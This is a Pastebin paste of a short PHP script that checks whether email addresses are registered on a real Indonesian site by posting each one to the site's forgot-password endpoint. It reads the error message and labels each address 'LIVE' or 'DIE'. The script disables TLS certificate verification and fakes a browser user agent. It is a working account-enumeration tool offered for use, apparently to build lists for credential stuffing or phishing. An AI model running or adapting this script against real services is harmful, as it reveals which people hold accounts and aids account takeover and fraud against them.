Advertisement
AlexaMP

danakini.co.id valid mail

Sep 13th, 2018
571
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.01 KB | None | 0 0
  1. <?php
  2. // Created by AlexaMP
  3. // Created date Sept 2018
  4. // Contact us [email protected]
  5. // Version 1.0.01
  6. $email = "[email protected]";
  7. $ch = curl_init();
  8. curl_setopt($ch, CURLOPT_URL, 'https://www.danakini.co.id/index.php/Signin/ForgotPassword');
  9. curl_setopt($ch, CURLOPT_ENCODING ,"");
  10. curl_setopt($ch, CURLOPT_POSTFIELDS,"email=$email");
  11. curl_setopt($ch, CURLOPT_POST, 1);
  12. curl_setopt($ch, CURLOPT_HEADER, 0);
  13. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  14. curl_setopt($ch, CURLOPT_COOKIESESSION, 1);
  15. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  16. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  17. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  18. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  19. curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-type: application/x-www-form-urlencoded"));
  20. $res = curl_exec($ch);
  21. if (stristr($res,"Email tidak terdaftar.")){
  22. echo "[]DIE  | $email ./AlexaMP";
  23. }else{
  24. echo "[]LIVE  | $email .AlexaMP";
  25. }
  26. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement